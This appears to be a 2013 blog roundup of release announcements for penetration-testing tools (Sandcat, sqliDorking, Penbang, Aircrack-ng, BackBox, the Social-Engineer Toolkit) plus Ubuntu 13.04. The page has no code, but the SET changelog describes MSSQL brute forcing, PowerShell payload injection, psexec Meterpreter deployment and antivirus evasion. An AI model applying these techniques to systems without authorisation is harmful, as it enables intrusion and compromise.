Thursday, May 30, 2013

Sandcat Browser 4.0 released - Lightweight, fast and extensible browser

Sandcat Browser 4.0 - Lightweight, fast and extensible.

Sandcat Browser 4.0 brings unique features that are useful for pen-testers and web developers.
Pen-Tester Tools
Chromium-Powered
Lua-Based Extensions
Display Filters
Console Extensions

Sandcat 4 adds a large number of enhancements, new features, extensions and bug fixes, and provides a dramatically improved user experience on several fronts.
Note: This release uses considerably less resources in comparison with the beta release. It also added user interface improvements, speed improvements and new features such as the Live Headers display filter and the capture/pause button.

What's New in Sandcat 4

Changelog -

UI Enhancements

  • Added a Page Menu with several useful options, including:
    • Ability to save the page from the web or from the cache
    • Ability to view the cached version of a page
    • Ability to view the page images
    • Ability to authenticate or re-authenticate
    • Ability to take a screenshot of the page and save as a file
    • Multiple reload options, zoom options and more
  • Added a new Preferences screen, and the ability to export and import the settings from a file.
  • Added a Search Engine selector.
  • Drag and drop
    • Added drag and drop support for tabs.
    • Added support for drag & drop of multiple files.
  • Added a redesigned About Screen that displays more details about the Sandcat installation, including the list of installed extensions.
  • Added an option for clearing the browsing data.
  • Added a redesigned error log screen.
  • Added a redesigned toolbar.
  • Added a redesigned Source page.
  • Added several Preview Extensions that work in combination with the new Resource and Request viewer extensions.
  • Added the ability to bookmark pages and a simple Bookmarks screen.
  • Added a History screen.
  • Added support for downloads and a download management screen.
  • Improved UI responsiveness.

Live Headers Enhancements

  • Added a display filter.
  • Added a redesigned live headers bar.
  • Added a capture/pause button.
  • Added the ability to load and save all requests or individual requests to files.
  • Added a dedicated cache per tab for storing request information (Live Headers Cache).
  • Added an options screen.
  • Added a Request Viewer with a preview tab, syntax highlighting, and request replay and editing capabilities.

Console Enhancements

  • Added a Lua Console.
  • Added a JavaScript Console based on the Sandcat Console.
  • Added new commands (Use the help command to see the list of commands).

Pen-Tester Tools Pack Enhancements

  • Added a new Request Editor with request loading capabilities and an advanced options screen.
  • Added a XHR Editor extension
  • Added an improved low-level Request Editor
  • Added new extensions that run as Sandcat Tasks (isolated processes):
    • HTTP Fuzzer
    • XHR Fuzzer
    • CGI Scanner
    • HTTP Brute Force extension
  • Added a new Script Runner extension with saving capability and the ability to execute TIScript.
  • Added an URL Encoder/Decoder extension.
  • Added a Ruby Console extension.
  • Added a Cache Viewer and a Cookies Viewer utility (thanks Nir Sofer for giving permission for their use in Sandcat).
  • Added the ability to create a code editor tab.
  • Added security related search engine options.
  • Improved Tor button.

Extension System Enhancements

  • Added the ability to launch Lua-based tasks, a Task Manager and a task indicator.
  • Added several new Lua libraries and objects. This includes the Console Library, the ExtensionPack Object, the UI Objects, the Prefs Library, the Task Object, the Sandcat Object, and the Selenite libraries.
  • Added the possibility of creating custom consoles.
  • Added a Sandcat TIScript object.
  • Added the ability to associate the HTML elements of a Sandcat Extension User Interface with a Lua table.
  • Added the ability to execute Lua script tags.
  • Improved Lua libraries and objects: Browser Library, App Library and Tab Object.

Bug Fixes

  • Fixed: Source page sometimes not displaying the proper syntax highlighting and exact source for non-HTML files.
  • Fixed: a window focus change related crash.
  • Fixed: occasional crashes when closing a tab while loading or exiting the browser.
  • Fixed: scrolling issues with the Source page.
  • Fixed: live headers sometimes not displaying the content-type.
  • Fixed: favicon sometimes not appearing.
  • Fixed: Sandcat Console unnecessarly resetting console output after visiting same domain URLs.
  • Fixed: JavaScript Sandcat.Write() function not working properly.

Additional changes

  • Configuration file format changed to JSON.
  • The following libraries were upgraded to the latest release: Chromium, OpenSSL and Sciter library.
  • The Tor application was upgraded to the latest release.
  • The Gelo library project has been discontinued and will be replaced by the new Exploit Creatorextension pack.
  • The Rudra library was replaced by the new Selenite's Runik library.
  • This page covers how to migrate extensions from Sandcat version 3 to 4


Source-

at No comments:

Tuesday, May 28, 2013

sqliDorking v1.1 released

Find pages vulnerable to SQLi using Google or Bing, also accepts a list of domains.

Features -
Google Dorking
Bing Dorking
Domain name list

Download -
Download sqliDorking.pl (10.3 kB)

Required python to be installed to run script.

Source-
http://sourceforge.net/projects/sqlidorking/

Screenshot -



at No comments:

Penbangv 2.0 - Penetration Testing Collection for crunchbang[Openbox(Debian)]

Penbang is a collection of tools aimed at the openbox environment. It includes Network Exploits, Vulnerability Assessment/Exploits, Network Analysis, Social Engineering tools, I.G.C, dsniff suite, and irpas. As well as a simple way of launching them.

 Update 21/5/2013 Version 0.0.2 ADDED Metasploit/Armitage sqlninja sqlsus wfuzz hydra hydra-gtk findmyhash etherape SMITM log_ex ParseLog Message of the day(Anything launched by Scripts.py) History interpreter(Arrow up shows last enrty) REMOVED ....DebianJoe, point taken tint2 config panel replacement concky config Wrong input clause in install.py Metasploit directly form menu.xml It assumes the following. Metasploit is a service; you can start it by /etc/init.d/mestaploit start Metasploit is enabled; update-rc.d metasploit enable OR update-rc.d -f metasploit defaults IF YOU REMOVED IT Armitage directly from menu.xml Nessus directly from menu.xml Pack List Network Exploits: aircrack-ng airmon-ng airodump-ng sslstrip sslsniff reaver ettercap subterfuge yamas SMITM -----0.0.2 Update Vulnerability Assessment/Exploits -----0.0.2 Update Metasploit/Armitage sqlninja sqlsus wfuzz hydra hydra-gtk Network Analysis: scapy kismet nmap zenmap tcpdump tshark wireshark etherape Social Engineering: Maltego I.G.C: crunch john Hash-ID findmyhash -----0.0.2 Update log_ex -----0.0.2 Update ParseLog -----0.0.2 Update dsniff suite: dsniff filesnarf mailsnarf msgsnarf urlsnarf webspy arpspoof dnsspoof macof sshmitm webmitm irpas: Not all tools from irpas are used dfkaa protos netenum tctrace itrace irdpresponder irdp ass igrp file2cable cdp

 Download -
Download penbang_0.0.2.zip (6.4 MB)

 Source-
http://sourceforge.net/projects/penbang/
at No comments:

Aircrack-ng 1.2 Beta 1 Released

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Aircrack-ng Changelog

Version 1.2-beta1 (changes from aircrack-ng 1.1) - Released 25 May 2013:
  • Airmon-ng: Added chipset information for ar9170usb, wl, rt2800usb, ar9271, wl12xx, RT3070STA, ath9k_htc, r871x_usb_drv, ath5k, carl9170 and various Intel drivers.
  • Airmon-ng: Fixed chipset information ipw2200.
  • Airmon-ng: Fixed output for r8187 driver.
  • Airmon-ng: Improved chipset information for a few drivers.
  • Airmon-ng: Support for displaying information about ath9k.
  • Airmon-ng: Added 'check kill' to automatically kill services that could interfere.
  • Airmon-ng: Fixed issues with Intel chipsets detection.
  • Airmon-ng: Updated iw download link.
  • Airmon-ng: Better mac80211 handling
  • Airmon-ng: Added detection for WiLink TI driver, rtl819xU, iwlwifi.
  • Airmon-zc: Improved version of Airmon-ng with more detailled information.
  • Airdecap-ng: Fixed decoding QoS frames (Closes: #667 and #858).
  • Airgraph-ng: Use Aircrack-ng Makefile instead of its own.
  • Airbase-ng: Fixed bug using clients list.
  • Airbase-ng: Fixed issue with QoS (ticket #760).
  • Airbase-ng: Fixed sending beacons with null SSID.
  • Airbase-ng: Allow non ASCII ESSID
  • Airodump-ng: Fixed buffer overflow (ticket #728).
  • Airodump-ng: Fixed channel parsing.
  • Airodump-ng: Fixed FreeBSD battery reading.
  • Airodump-ng: Renamed “Packets” column to “Frames” (“Packets” was not correct).
  • Airodump-ng: Fixed XML bugs when outputting NetXML: ESSID containing '&' or chinese characters, when multiple encryption are used.
  • Airodump-ng: Add alternative paths for Airodump-ng OUI file.
  • Airodump-ng: Added GPSd 2.92+ support (JSON).
  • Airodump-ng: Add option –manufacturer to display manufacturer column on airodump-ng.
  • Airodump-ng: Add feature to show APs uptime (–uptime) based on the timestamp.
  • Airodump-ng-OUI-update: Fixed OUI URL and allow CURL redirect (ticket #829).
  • Airdrop-ng: removed .py from file names.
  • Airdrop-ng: Fixed bug in installer.
  • Airdrop-ng: Fixed OUI lookup.
  • Airdrop-ng: Fixed bug when several BSSID have the same ESSID.
  • Airdrop-ng: Doesn't constantly parse anymore, wait 5 seconds each time it parses.
  • Airdrop-ng: Fixed crash when failing to get channel or when rules file didn't exist.
  • Airdrop-ng: Fixed to use lorcon.py/lorcon2 libs.
  • Airdrop-ng: Updated README.
  • Airdrop-ng: Fixed error preventing update to work.
  • Versuck-ng: New script to do the same thing as the kismet autowep plugin from the CLI.
  • Aircrack-ng: Fixed counter display error when cracking WPA.
  • Aircrack-ng: Added output of the WPA handshake to EWSA project file.
  • Aircrack-ng: Added output of the WPA handshake to oclhashcat+ project file.
  • Aircrack-ng: Added benchmark option, -S.
  • Aircrack-ng: Fixed -u option.
  • Aircrack-ng: PIC fix for hardened systems from Francisco Blas Izquierdo Riera (klondike)
  • Aircrack-ng: Allow dictionaries larger than 2Gb.
  • Aircrack-ng: Give a better message when there's an error with the dictionary.
  • Aircrack-ng: Prevent a buffer overflow from happening (Wojciech Waga).
  • Aireplay-ng: Added migration mode attack from Leandro Meiners and Diego Sor from Core Security (BlackHat Las Vegas 2010)
  • Aireplay-ng, Airodump-ng: Added option to ignore issue with -1 channel.
  • Airserv-ng: Fixed crash when clients disconnect.
  • Besside-ng-crawler: Added EAPOL Crawler.
  • Airdecloak-ng: Fixed bug when using pcap files with PPI headers.
  • dcrack: Distributed cracking server/client
  • wifi-detect.sh: reference script for testing wifi card detection using iwconfig vs ls /sys/class/net
  • WPA Clean: Tool to merge and clean WPA capture files.
  • Wireless Panda: C# Library to parse Airodump-ng output files (and added example project).
  • OSdep (Linux): Setting fixed bitrates on mac80211 2.6.31 and up.
  • OSdep (Linux): Added support for nl80211 thanks to impulse32. Use 'make libnl=true' to add netlink support (Ticket #1004).
  • Manpages: Improvement and fixes for Airgraph-ng, Airodump-ng, packetforge-ng, Aircrack-ng
  • Manpages: Fixed various spelling issues and single quote issues.
  • Makefiles: Added tests for the different tools.
  • Makefiles: Various fixes and improvements.
  • Makefiles: Added support for libgrypt instead of OpenSSL via parameter.
  • Patches: Added a few patches.
  • Removed useless script: patchchk.
  • Finally fixed licensing issues.
  • Fixed endianness issues in most of the tools.
  • Fixed cppcheck errors (Ticket #957).
  • Fixed various compilation issues on Linux and Cygwin, GNU/Hurd, Darwin (OSX) and Sparc.
  • Fixed compilation on recent gcc versions on Linux, Cygwin.
  • Added instructions for Travis CI: Free Hosted Continuous Integration Platform for the Open Source Community.
  • Added Readme.Md for GitHub. Aircrack-ng subversion repository is synced on GitHub: http://github.com/aircrack-ng/aircrack-ng
  • Various other small bug fixes.

    Download :
    aircrack-ng-1.2-beta1-win.zip (7.90 MB) (windows) aircrack-ng-1.2-beta1.tar.gz (3.29 MB) Unix 
Source-
at No comments:

BackBox Linux 3.05 released!

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

The BackBox Team is pleased to announce the updated release of BackBox Linux, the version 3.05. This release include features such as Linux Kernel 3.2, compat-wireless 3.8 (with Aircrack-NG patch) and Xfce 4.8.

The ISO images (32bit & 64bit) can be downloaded from the following location:-
http://www.backbox.org/downloads

What's new 
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Update menu
  • Improved Wi-Fi drivers (compat-wireless v3.8 with Aircrack-NG patch)
  • Full support to Kernel 3.5 and 3.8 (install it with apt-get/synaptic)
  • Predisposition to ARM architecture (new armhf.iso coming soon)
  • New and updated hacking tools (automater, inundator, ettercap, wireshark, se-toolkit, metasploit, sqlmap, beef, recon-ng, zaproxy, weevely, thc-ipv6, truecrack, hashcat, etc.)
System requirements
32-bit or 64-bit processor
512 MB of system memory (RAM)
4.4 GB of disk space for installation
Graphics card capable of 800×600 resolution
DVD-ROM drive or USB port

Source-
at No comments:

Monday, May 27, 2013

The Social-Engineer Toolkit (SET) v5.1 Released

The Social-Engineer Toolkit (SET) version 5.1 codename “Name of the Doctor” has been released. This version adds a complete rewrite of the MSSQL Bruter as well as a new attack vector utilizing the PSExec functionality within Metasploit. The MSSQL Bruter now incorporates UDP port 1434 quick discovery by sending a specially crafted packet to MSSQL servers and returning the port automatically. This technique eliminates the need to port scan and quickly identifies the SQL server as well as what port the SQL server is listening on. In addition, SET has moved away from the _mssql python module and towards impacket from Core Security. Main reason for this is due to some instabilities in later versions of _mssql with execute_query() being broke as well as the functionality built into impacket makes it much easier to use.
n addition to utilizing impacket, originally in SET you had two options for payload delivery, the first being POwerShell and the second the binary 2 hex debug conversion attack vector. This has been changed to automatically detect if PowerShell is installed on the victim machine, if it is – SET will automatically deploy a PowerShell injection technique that has been completely rewritten in the MSSQL module. If it does not detect PowerShell, it will automatically revert back to the debug. Lastly on the MSSQL Bruter portions, performance has been increased significantly on the brute forcing, discovery, and deploying of payloads.
For a video of the features, check out below:

A new attack vector build into SET is the new psexec attack vector inside the Fast-Track menu. During a penetration test, often times you may have credentials to a server and want Meterpreter on a wide scale level. The psexec traditional module gets picked up by Anti-Virus due to known signatures being used. You can either use the EXE::Custom advanced feature however it still doesn’t give you the ability to select RHOSTS (multiple IP addresses) unless you custom script it or through something like railgun. The newer module “psexec_command” allows you to specify RHOSTS as well as execute a command on the operating system. Inside of SET, the psexec attack vector will automatically created a meterpreter backdoor through PowerShell and deploy it to systems you have permission to (RHOSTS). You can either use a username and password that you’ve decrypted or the hash for the pass the hash attack vector.
In addition to the new attack vectors, a number of other improvements, bug fixes, and enhancements have been made in this release. For more on all of the changes, check out the changelog before:
~~~~~~~~~~~~~~~~
version 5.1
~~~~~~~~~~~~~~~~
* when specifying a custom wordlist in SET – added the ability for ports to be specified ipaddr:portnum for example 192.168.5.5:2052 just in case a SQL server is not listening on 1433
* incorporated udp port 1434 enumeration instead of portscanning – much more faster and efficent – also finds ports that are not on port 1433 (thanks Larry Spohn)
* removed the src/core/portscan.py it is no longer needed
* added impacket as a dependacy – will be used for psexec command execution and TDS connections via mssql
* fixed an issue that would cause the import modules to not load properly when relaunching the MSSQL Brute attack
* improved the speed of the MSSQL brute attack on initial brute force
* completely rewrote MSSQL Brute to incorporate impacket – SET no longer uses the _mssql module – highly buggy in the latest versions
* improved udp 1434 detection capability by piping through the printCIDR function which will utilize CIDR notations when scanning
* incorporated new function called capture which will take stdout from function calls and present them as a string – important when doing regex in impacket
* streamlined the MSSQL bruter to automatically profile the system to determine if Powershell is installed, if so it will automatically do powershell injection, if not it will fall back to the Windows debug method for payload delivery
* rewrote the entire powershell deployment module – it now ties in to standard powershell shell payload delivery system
* added dynamic shellcode patching to the MSSQL bruter – now generates shellcode automatically, cast it unicode, then base64 encoding for EncodedCommand powershell bypass technique
* rewrote the hex2binary deployment method to support the new impacket method – it will now automatically deliver a binary based on the attack vector that you want to use
* shrunk the powershell injection code to fit properly within MSSQL xp_cmdshell one call
* added one line for xp_cmdshell disable which works on later versions of Windows
* removed the portscan functionality completely out of the MSSQL payload
* rewrote all portions of the MSSQL bruter to be fully impacket and removed the dependacy for _mssql from fast-track
* added new attack vector within the Fast-Track menu “PSEXEC Powershell Injection” which will allow you to specify psexec_command and compromise via direct memory injection
* added ability to set threads within the new PSEXEC PowerShell Injection technique
* added quick dynamic patching for the powershell injection technique for payloads
* added a new trustedsec intro ascii art that has the TS logo on it
* updated rid_enum to the latest github version inside SET

Source-
at No comments:

Thursday, May 2, 2013

Ubuntu 13.04 Released "RaringRingtail"

The Ubuntu developers are moving quickly to bring you the absolute latest and greatest software the Open Source community has to offer. The Ubuntu 13.04 Release is the next version of Ubuntu.

 In Ubuntu 13.04 the kernel is based on v3.8, LibreOffice has been upgraded to version 4.0, and the default music player is Rythmbox 2.98. It no longer includes the UbuntuOne music store plug-in. You can now access the Ubuntu music service through an entry in the sidebar launcher. There are various improvements in the Unity desktop.

Get Ubuntu 13.04

Upgrading from Ubuntu 12.10

To upgrade from Ubuntu 12.10 on a desktop system:
  • Open Software Sources.
  • Press Alt+F2 and type in "update-manager" (without the quotes) into the command box.
  • Update Manager should open up and tell you: New distribution release '13.04' is available.
  • Click Upgrade and follow the on-screen instructions.
To upgrade from Ubuntu 12.10 on a server system:
  • Install the update-manager-core package if it is not already installed.
  • Launch the upgrade tool with the command sudo do-release-upgrade.
  • Follow the on-screen instructions.
Note that the server upgrade will use GNU screen and automatically re-attach in case of e.g. dropped connection problems.
Offline upgrade options via alternate CDs are no longer offered for Ubuntu Desktop and Ubuntu Server. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above.

Upgrading from other releases

Users of other Ubuntu releases need to upgrade first to 12.10, and then to 13.04.
For further information on upgrading to 12.10, please see its upgrade instructions.

Ubuntu downloader for Windows discontinued

Due to various bugs in Wubi that have not been addressed in time for the final release, the Ubuntu team will not be releasing the Wubi installer with 13.04. You can read more about this decision here. Users who wish to try out Ubuntu without repartitioning a Windows system are encouraged to use a live system instead, booted from either a DVD or a USB disk.

Support lifespan reduced

Ubuntu 13.04 will only be supported for 9 months. Previous non-LTS releases were supported for 18 months. For more information, please read the announcements here orhere.

Download Ubuntu 13.04

13.04 images can be downloaded from a location near you.
You can download 13.04 ISOs from:
http://releases.ubuntu.com/13.04/ (Ubuntu Desktop and Server)
http://cloud-images.ubuntu.com/releases/13.04/release/ (Ubuntu Cloud Server)
http://cdimage.ubuntu.com/netboot/13.04/ (Ubuntu Netboot)
http://cdimage.ubuntu.com/ubuntu-core/releases/13.04/release/ (Ubuntu Core)
http://cdimage.ubuntu.com/edubuntu/releases/13.04/release/ (Edubuntu DVD)
http://cdimage.ubuntu.com/kubuntu/releases/13.04/release/ (Kubuntu)
http://cdimage.ubuntu.com/lubuntu/releases/13.04/release/ (Lubuntu)
http://cdimage.ubuntu.com/ubuntustudio/releases/13.04/release/ (Ubuntu Studio)
http://cdimage.ubuntu.com/ubuntu-gnome/releases/13.04/release/ (Ubuntu-GNOME)
http://cdimage.ubuntu.com/ubuntukylin/releases/13.04/release/ (UbuntuKylin)
http://cdimage.ubuntu.com/xubuntu/releases/13.04/release/ (Xubuntu)

New features in 13.04

Please see the Raring blueprint list for details.
Please test and report any bugs you find:
http://help.ubuntu.com/community/ReportingBugs
Source:- https://wiki.ubuntu.com/RaringRingtail/ReleaseNotes
at No comments: